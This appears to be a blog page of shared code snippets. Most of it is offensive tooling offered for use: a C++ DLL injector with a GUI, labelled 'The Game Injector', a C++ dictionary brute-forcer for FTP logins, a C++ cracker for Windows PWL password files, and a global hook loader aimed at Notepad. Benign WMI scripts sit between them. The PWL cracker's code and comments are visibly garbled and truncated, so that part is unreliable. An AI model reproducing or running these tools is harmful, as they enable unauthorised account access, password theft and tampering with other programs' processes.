Search

DLL injection with GUI

Example of DLL injection with a GUI in c++
//DLL injection with GUI
#include
#include
/* Declare Windows procedure */
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
/* Make the class name into a global variable */
char szClassName[ ] = "WindowsApp";
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
HWND hwnd;
MSG messages;
WNDCLASSEX wincl;
wincl.hInstance = hThisInstance;
wincl.lpszClassName = szClassName;
wincl.lpfnWndProc = WindowProcedure;
wincl.style = CS_DBLCLKS;
wincl.cbSize = sizeof (WNDCLASSEX);
wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
wincl.lpszMenuName = NULL;
wincl.cbClsExtra = 0;
wincl.cbWndExtra = 0;
wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+7;
if (!RegisterClassEx (&wincl))
return 0;
hwnd = CreateWindowEx (
0,
szClassName,
"The Game Injector ",
WS_SYSMENU|WS_VISIBLE,
CW_USEDEFAULT,
CW_USEDEFAULT,
400,
200,
HWND_DESKTOP,
NULL,
hThisInstance,
NULL
);
while (GetMessage (&messages, NULL, 0, 0))
{
TranslateMessage(&messages);
DispatchMessage(&messages);
}
return messages.wParam;
}
HWND Input1,Input2;
HWND Inject;
BOOL SetPrivilege(LPSTR type) // more flexible
{
HANDLE Htoken;
TOKEN_PRIVILEGES tokprivls;
if(!OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &Htoken)){
return 0;
}
tokprivls.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, type, &tokprivls.Privileges[0].Luid);
tokprivls.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
BOOL Success =AdjustTokenPrivileges( Htoken, FALSE, &tokprivls, sizeof(tokprivls), NULL, NULL);
CloseHandle(Htoken);
return Success;
}
HANDLE GetHandle(char *proc)
{
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
HANDLE Snap = CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
Process32First(Snap,&pe32);
do{
if(stricmp(pe32.szExeFile,proc)==0)
{
SetPrivilege(SE_DEBUG_NAME);
return OpenProcess(PROCESS_ALL_ACCESS,0,pe32.th32ProcessID);
}}while(Process32Next(Snap,&pe32));CloseHandle(Snap);
}
void InjectDll(char* Name, char *path)
{
HANDLE hProcess = GetHandle(Name);
if(hProcess){
int DllPath = strlen(path) + 20;
LPVOID MemSp = VirtualAllocEx(hProcess,NULL,DllPath,MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(hProcess,MemSp,path,DllPath,NULL);
HANDLE hThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)GetProcAddress(LoadLi
brary("Kernel32.dll"), "LoadLibraryA"), MemSp, 0, NULL);
if(hThread){
WaitForSingleObject(hThread, 30000);
CloseHandle(hThread);
}
VirtualFreeEx(hProcess, MemSp, 0, MEM_RELEASE);
}
else {MessageBox(0,"Could not get the process handle .",0,0);}
}
char proc[50],dll[260];
LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
HWND hBmpStat;
HBITMAP hBitmap;
HFONT hFont ;
switch (message)
{
case WM_CREATE:
hFont = CreateFont(20, 0, 0, 10, FW_DONTCARE, 0, 0, 0, ANSI_CHARSET, OUT_TT_PRECIS, CLIP_TT_ALWAYS, DEFAULT_QUALITY, FF_DONTCARE, "Microsoft Sans MS");
hBitmap = (HBITMAP) LoadImage(NULL, "C:\\WINDOWS\\system32\\setup.bmp", IMAGE_BITMAP, 0, 0, LR_LOADFROMFILE);
// zomfg h4x
hBmpStat = CreateWindowEx(0,"Static","",WS_VISIBLE | WS_CHILD | SS_BITMAP,
-200,-220,0,0,hwnd,0,0,0);
SendMessage(hBmpStat, STM_SETIMAGE, IMAGE_BITMAP, (LPARAM) hBitmap);
Inject = CreateWindow("Button","INJECT",WS_CHILD | WS_VISIBLE | WS_BORDER,
190, 20, 180, 38,hwnd,(HMENU)100,0,NULL);
Input1 = CreateWindow("Edit", "wmplayer.exe",WS_CHILD | WS_VISIBLE | WS_BORDER,
10, 20, 180,18,hwnd,0,0,NULL);
Input2 = CreateWindow("Edit", "c:\\sample.dll",WS_CHILD | WS_VISIBLE | WS_BORDER,
10, 40, 180,18,hwnd,0,0,NULL);
SendMessage(Inject,WM_SETFONT,WPARAM(hFont),0);
break;
case WM_DESTROY:
PostQuitMessage (0);
break;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case 100:
SendMessage(Input1,WM_GETTEXT,sizeof(proc),LPARAM(proc));
if(proc!=0)
{
SendMessage(Input2,WM_GETTEXT,sizeof(dll),LPARAM(dll));
if(dll!=0)
InjectDll(proc,dll);
}break;
default:break;
}break;
default:
return DefWindowProc (hwnd, message, wParam, lParam);
}
return 0;
}
view raw DLL injection with GUI.cpp hosted with ❤ by GitHub

WMI: Rename a Computer

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colComputers = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objComputer in colComputers
errReturn = ObjComputer.Rename("NewName")
WScript.Echo "Computer name is now " & objComputer.Name
Next
view raw Rename a Computer.vbs hosted with ❤ by GitHub

Crack FTP Account using Dictionary (C++)

An example of how to crack an FTP account using the Dictionary attack
//Crack FTP Account using Dictionary (C++)
#include
#include
int wsend(SOCKET sock,char*msg,...)
{
char szBuffer[256];
va_list va;
va_start (va, msg);
vsprintf (szBuffer, msg, va);
va_end (va);
return ( send(sock,szBuffer,strlen(szBuffer),0 ) );
}
BOOL CheckValidation(struct sockaddr_in sock_in,char*szUser,char*szPass)
{
BOOL bResult=0;
char szBuffer[256];
SOCKET sock = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
if(sock!=INVALID_SOCKET)
if( connect(sock,(struct sockaddr*)&sock_in,sizeof(sock_in))==0)
if(recv(sock,szBuffer,256,0)!=SOCKET_ERROR)
if(strstr(szBuffer,"220"))
{
if(wsend(sock,"USER %s\r\n",szUser)!=SOCKET_ERROR)
if(recv(sock,szBuffer,256,0)!=SOCKET_ERROR)
if(strstr(szBuffer,"331"))
{
if(wsend(sock,"PASS %s\r\n",szPass)!=SOCKET_ERROR)
if(recv(sock,szBuffer,256,0)!=SOCKET_ERROR)
if(strstr(szBuffer,"230"))
bResult = 1;
}else printf("No such user ( %s )\r\n",szUser);
}else printf("ftp server not ready \r\n");
Sleep(100);
closesocket(sock);
return bResult;
}
int main()
{
char*szBuffer;
WSADATA wdata;
struct sockaddr_in s_in;
s_in.sin_family=AF_INET;
s_in.sin_port =htons(21);
char szFile[25]="test.txt",
szUser[25]="UserName",
*pntr;
BOOL bResult=0;
HANDLE hFile = CreateFile(szFile,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(hFile!=INVALID_HANDLE_VALUE)
{
DWORD dwSize = GetFileSize(hFile,0),
dwReadBytes=0;
if(dwSize!=0)
{
szBuffer=(char*)malloc(dwSize+20);
if(szBuffer!=0)
{
if( ReadFile(hFile,szBuffer,dwSize,&dwReadBytes,0) )
{
if(dwReadBytes==dwSize)
{
if ( !WSAStartup(0x202,&wdata) )
{
LPHOSTENT honte = gethostbyname("ftp.server.net");
if( honte )
{
s_in.sin_addr=*((LPIN_ADDR)*honte->h_addr_list);
pntr=strtok(szBuffer,"\r\n");//ignore first line
while(0 !=pntr)
if( 0!=(pntr=strtok(NULL,"\r\n")))
if(CheckValidation(s_in,szUser,pntr))
{
printf("User cridentials matched .'%s' '%s' \r\n",szUser,pntr);
break;
}
else printf("No match with user '%s' with password '%s'\r\n",szUser,pntr);
}else printf("Unable to resolve given address\r\n");
}WSACleanup();
}else printf("Failed to read complete file\r\n");
}else printf("Unable to read file\r\n");
free(szBuffer);
}else printf("Unable to allocate necessary memory\r\n");
}else printf("Unable to get file size\r\n");
}else printf("Error Opening File\r\n");
CloseHandle(hFile);
printf("Finished try.Press any key to exit\r\n");
getch();
return 0;
}
view raw Crack FTP Account using DictionaryAttack.cpp hosted with ❤ by GitHub

Get the computer password (C++) 

//Get the computer password
# include
# include
# include
# include
# include
# include
# include

unsigned char huge Data[100001];
unsigned char keystream[1001];
int Rpoint[300];

void main(int argc,char *argv[]){
FILE *fd;
int i,j;
int size;
char ch;
char *name;
int cracked;
int sizemask;
int maxr;
int rsz;
int pos;
int Rall[300]; Resourse allocation table 

if(argc<2){
printf("usage: glide filename (username)");
exit(1);
}
Read PWL file 

fd=fopen(argv[1],"rb");
if(fd==NULL){
printf("can't open file %s",argv[1]);
exit(1);
}
size=0;
while(!feof(fd)){
Data[size++]=fgetc(fd);
}
size--;
fclose(fd);

Find Username 
name=argv[1];
if(argc>2)name=argv[2];
printf("Username:%s
",name);

Copy encrypted text into keystream 
cracked=size-0x0208;
if(cracked<0)cracked=0;
if(cracked>1000)cracked=1000;
memcpy(keystream,Data+0x208,cracked);

Generate 20 bytes of keystream 
for(i=0;i<20;i++){
ch=toupper(name);
if(ch==0)break;
if(ch=='.')break;
keystream^=ch;
};
cracked=20;

Find allocated resources 

sizemask=keystream[0]+(keystream[1]<<8);
printf("Sizemask:%04X
",sizemask);

for(i=0;i<256;i++){
if(Data!=0xff){
Rall[Data]++;
if(Data>maxr)maxr=Data;
}
}

maxr=(((maxr/16)+1)*16); Resourse pointer table size appears to be
divisible by 16 

Search after resources 

Rpoint[0]=0x0208+2*maxr+20+2; First resources 
for(i=0;i;
rsz=Data[pos]+(Data[pos+1]<<8);
rsz^=sizemask;
printf("Analysing block with size:%04x (%d:%d)
",rsz,i,Rall);
if((Rall==0)&&(rsz!=0)){
printf("Unused resourse has nonzero size!!!
");
printf("If last line produed any:You may try to recover
");
printf("Press y to attempt the recovery
");
ch=getch();
if(ch!='y')exit(0);
rsz=2;
i=i-1;
}
pos=pos+rsz;

Resourse have a tedency to have the wrong size for some reason
Chech for correct size

if(i & 0x00ff;
keystream[21+2*i]^=(Rpoint>>8) & 0x00ff;
}
cracked+=maxr*2+2;
printf("%d Bytes of ketstream recoverd 
",cracked);

Decrypt resources 
for(i=0;i;
if(rsz>cracked)rsz=cracked;
printf("Resource[%d](%d)
",i,rsz);
for(j=0;j+j]^keystream[j]);
printf("
");
}
exit(0);
}

WMI: Get DNS Host Name

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objItem in colItems
Wscript.Echo "Computer Name: " & objItem.Name
Next
view raw Get DNS Host Name.vbs hosted with ❤ by GitHub

Hooking Notepad.exe (c++)

//Hooking Notepad in c++
#include <windows.h>;
int main()
{
HOOKPROC hkprcSysMsg;
static HINSTANCE hinstDLL;
static HHOOK hhookSysMsg;
hinstDLL = LoadLibrary((LPCTSTR) "c:\\windows\\notepad.dll");
hkprcSysMsg = (HOOKPROC)GetProcAddress(hinstDLL, "SysMessageProc");
hhookSysMsg = SetWindowsHookEx(WH_SYSMSGFILTER,hkprcSysMsg,hinstDLL,0);
return 0;
}
view raw Hooking Notepad.cpp hosted with ❤ by GitHub
Subscribe to: Posts ( Atom )